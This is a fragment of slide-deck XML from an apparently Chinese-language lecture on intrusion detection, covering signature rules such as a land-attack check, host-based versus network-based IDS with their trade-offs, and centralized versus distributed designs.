                <a:endParaRPr lang="zh-CN" altLang="en-US"/>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="122951" name="Rectangle 1094">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{4635173F-EA3A-40EB-8785-3225FA657787}"/>
                  </a:ext>
                </a:extLst>
              </p:cNvPr>
              <p:cNvSpPr>
                <a:spLocks noChangeArrowheads="1"/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="4380" y="2683"/>
                <a:ext cx="31" cy="150"/>
              </a:xfrm>
              <a:prstGeom prst="rect">
                <a:avLst/>
              </a:prstGeom>
              <a:solidFill>
                <a:srgbClr val="FF0000"/>
              </a:solidFill>
              <a:ln w="7938">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952" name="Rectangle 1095">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{DB36A517-D06B-4886-A3CA-A17E0B6E5981}"/>
                  </a:ext>
                </a:extLst>
              </p:cNvPr>
              <p:cNvSpPr>
                <a:spLocks noChangeArrowheads="1"/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="4546" y="2683"/>
                <a:ext cx="26" cy="67"/>
              </a:xfrm>
              <a:prstGeom prst="rect">
                <a:avLst/>
              </a:prstGeom>
              <a:solidFill>
                <a:srgbClr val="FF0000"/>
              </a:solidFill>
              <a:ln w="7938">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:miter lim="800000"/>
                <a:headEnd/>
                <a:tailEnd/>
              </a:ln>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122945" name="AutoShape 1096">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{3AAF2FFF-6599-42AD-B779-9984A810AD14}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="3504" y="1872"/>
              <a:ext cx="720" cy="96"/>
            </a:xfrm>
            <a:prstGeom prst="rightArrow">
              <a:avLst>
                <a:gd name="adj1" fmla="val 50000"/>
                <a:gd name="adj2" fmla="val 187500"/>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2946" name="Text Box 1097">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{471FAAC9-2AFC-4C50-ACBE-11320B7FA80B}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr txBox="1">
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="3456" y="1584"/>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kumimoji="0" lang="en-US" altLang="zh-CN" sz="2400">
                  <a:solidFill>
                    <a:schemeClr val="accent1"/>
                  </a:solidFill>
                  <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                </a:rPr>
                <a:t>intrusion</a:t>
              </a:r>
              <a:endParaRPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="2400">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="245834" name="Text Box 1098">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{243C1C39-3A17-4C92-B368-F68EBAC4D1ED}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1870075" y="5881688"/>
            <a:ext cx="5594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kumimoji="0" lang="zh-CN" altLang="en-US" sz="2800" b="1">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Comic Sans MS" panose="030F0702030302020204" pitchFamily="66" charset="0"/>
              </a:rPr>
              <a:t>存在的问题：无法检测未知攻击！</a:t>
            </a:r>
            <a:endParaRPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="2800" b="1">
              <a:solidFill>
                <a:schemeClr val="tx2"/>
              </a:solidFill>
              <a:latin typeface="Comic Sans MS" panose="030F0702030302020204" pitchFamily="66" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="245835" name="Text Box 1099">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{EEB3CCB9-84FF-4EC3-9570-BAF16D73D94C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1474788" y="5014913"/>
            <a:ext cx="618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0" lang="en-US" altLang="zh-CN" sz="2400">
                <a:latin typeface="Times" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>Example: </a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="2400" b="1" i="1">
                <a:latin typeface="Times" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>if</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="2400">
                <a:latin typeface="Times" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t> (src_ip == dst_ip) </a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="2400" b="1" i="1">
                <a:latin typeface="Times" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>then</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="2400">
                <a:latin typeface="Times" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t> “land attack”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45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34" grpId="0" autoUpdateAnimBg="0"/>
      <p:bldP spid="245835"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80369A71-73DC-4C4C-A8E2-F37D6D6C06A8}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="457200" indent="-457200" algn="just" eaLnBrk="1" hangingPunct="1">
              <a:spcBef>
                <a:spcPct val="50000"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="4000" b="1">
                <a:solidFill>
                  <a:srgbClr val="0000FF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>入侵检测的分类（</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="4000" b="1">
                <a:solidFill>
                  <a:srgbClr val="0000FF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>2</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="4000" b="1">
                <a:solidFill>
                  <a:srgbClr val="0000FF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>）</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="124931" name="Rectangle 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A024BDC1-3D71-469B-B456-53EF79EB63CB}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="323850" y="2209800"/>
            <a:ext cx="8286750" cy="4114800"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="just" eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="3600" b="1"/>
              <a:t>按照数据来源：</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" algn="just" eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="120000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="3200" b="1"/>
              <a:t>基于主机：系统获取数据的依据是系统运行所在的主机，保护的目标也是系统运行所在的主机</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" algn="just" eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="120000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="3200" b="1"/>
              <a:t>基于网络：系统获取的数据是网络传输的数据包，保护的是网络的运行</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" algn="just" eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="120000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="3200" b="1"/>
              <a:t>混合型</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a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{23F1A118-F094-403E-8E1C-497E9B3845EB}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="539750" y="2060575"/>
            <a:ext cx="7696200"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r>
              <a:rPr lang="zh-CN" altLang="en-US" b="1" dirty="0"/>
              <a:t>监视与分析主机的审计记录</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" b="1" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:endParaRPr lang="zh-CN" altLang="en-US" b="1" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="1" dirty="0"/>
              <a:t>可以不运行在监控主机上</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" b="1" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:endParaRPr lang="zh-CN" altLang="en-US" b="1" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="1" dirty="0"/>
              <a:t>能否及时采集到审计记录？</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" b="1" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:endParaRPr lang="zh-CN" altLang="en-US" b="1" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="1" dirty="0"/>
              <a:t>如何保护作为攻击目标的主机审计子系统？</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="125955" name="Text Box 6">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A834155B-9757-493C-9105-F58008EF17F9}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1219200" y="9906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zh-CN" altLang="en-US" sz="4000" b="1">
                <a:solidFill>
                  <a:srgbClr val="0000FF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>基于主机</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2400">
              <a:latin typeface="宋体" panose="02010600030101010101" pitchFamily="2"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7B80464F-B39E-4B42-9B11-874F2DCD0BD3}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1042988" y="549275"/>
            <a:ext cx="7772400" cy="1143000"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="just" eaLnBrk="1" hangingPunct="1">
              <a:spcBef>
                <a:spcPct val="50000"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="4000" b="1">
                <a:solidFill>
                  <a:srgbClr val="0000FF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>主机</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="4000" b="1">
                <a:solidFill>
                  <a:srgbClr val="0000FF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>IDS</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="4000" b="1">
                <a:solidFill>
                  <a:srgbClr val="0000FF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>示意图</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="126979" name="Picture 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9BCB5F9F-A5B2-4197-8C05-300694515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866900"/>
            <a:ext cx="7848600" cy="411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a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2BC321A1-A310-484A-9E33-82BA59ED6CE6}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="539750" y="2276475"/>
            <a:ext cx="830580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pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="3100" b="1"/>
              <a:t>在共享网段上对通信数据进行侦听采集数据</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="3100" b="1"/>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="3100" b="1"/>
              <a:t>主机资源消耗少 </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="3100" b="1"/>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="3100" b="1"/>
              <a:t>提供对网络通用的保护</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="3100" b="1"/>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="3100" b="1"/>
              <a:t>如何适应高速网络环境？</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="3100" b="1"/>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="3100" b="1"/>
              <a:t>非共享网络上如何采集数据？</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="128003" name="Text Box 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A0280E3A-95F8-4727-8C75-2F9B88367638}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1219200" y="990600"/>
            <a:ext cx="5791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buClrTx/>
              <a:buSzTx/>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="4000" b="1">
                <a:solidFill>
                  <a:srgbClr val="0000FF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>基于网络</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2400">
              <a:latin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C86F25CF-D826-4CE0-8C12-D6508780FE94}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1116013" y="404813"/>
            <a:ext cx="7772400" cy="1143000"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="just" eaLnBrk="1" hangingPunct="1">
              <a:spcBef>
                <a:spcPct val="50000"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="4000" b="1">
                <a:solidFill>
                  <a:srgbClr val="0000FF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>网络</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="4000" b="1">
                <a:solidFill>
                  <a:srgbClr val="0000FF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>IDS</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="4000" b="1">
                <a:solidFill>
                  <a:srgbClr val="0000FF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>示意图</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="129027" name="Picture 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{FE7F47FF-C588-48C4-B31E-F4A612E3E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2205038"/>
            <a:ext cx="7561263"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86D4670A-0A20-473C-AE33-0FE651789EFF}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="4000" b="1">
                <a:solidFill>
                  <a:srgbClr val="0000FF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>两类</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="4000" b="1">
                <a:solidFill>
                  <a:srgbClr val="0000FF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>IDS</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="4000" b="1">
                <a:solidFill>
                  <a:srgbClr val="0000FF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>监测软件</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="130051" name="Rectangle 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{DAD232B9-03EE-40B7-B324-07F665A1A370}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="half" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="685800" y="2286000"/>
            <a:ext cx="3810000" cy="4114800"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="3200" b="1"/>
              <a:t>网络</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="3200" b="1"/>
              <a:t>IDS</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2800" b="1"/>
              <a:t>侦测速度快 </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2800" b="1"/>
              <a:t>隐蔽性好 </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2800" b="1"/>
              <a:t>视野更宽 </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2800" b="1"/>
              <a:t>较少的监测器 </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2800" b="1"/>
              <a:t>占资源少 </a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="zh-CN" sz="2800" b="1"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="130052" name="Rectangle 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{5DC660E1-F53A-45AF-9334-977EAEDC2814}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="half" idx="2"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4648200" y="2286000"/>
            <a:ext cx="3810000" cy="4114800"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="3200" b="1"/>
              <a:t>主机</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="3200" b="1"/>
              <a:t>IDS</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2800" b="1"/>
              <a:t>视野集中 </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2800" b="1"/>
              <a:t>易于用户自定义</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2800" b="1"/>
              <a:t>保护更加周密</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2800" b="1"/>
              <a:t>对网络流量不敏感  </a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="zh-CN" sz="2800" b="1"/>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CB469425-9458-43EE-B597-F1AC6DE1D454}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="4000" b="1">
                <a:solidFill>
                  <a:srgbClr val="0000FF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>入侵检测的分类（</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="4000" b="1">
                <a:solidFill>
                  <a:srgbClr val="0000FF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>3</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="4000" b="1">
                <a:solidFill>
                  <a:srgbClr val="0000FF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>）</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="131075" name="Rectangle 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F4634024-1CDE-4E02-B891-B913558AF430}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="609600" y="2209800"/>
            <a:ext cx="7772400" cy="2971800"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="3600" b="1"/>
              <a:t>按系统各模块的运行方式</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="3200" b="1"/>
              <a:t>集中式：系统的各个模块包括数据的收集分析集中在一台主机上运行</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="3200" b="1"/>
              <a:t>分布式：系统的各个模块分布在不同的计算机和设备上</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2BD5D803-9E03-4B92-BE9B-696AC942BC78}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
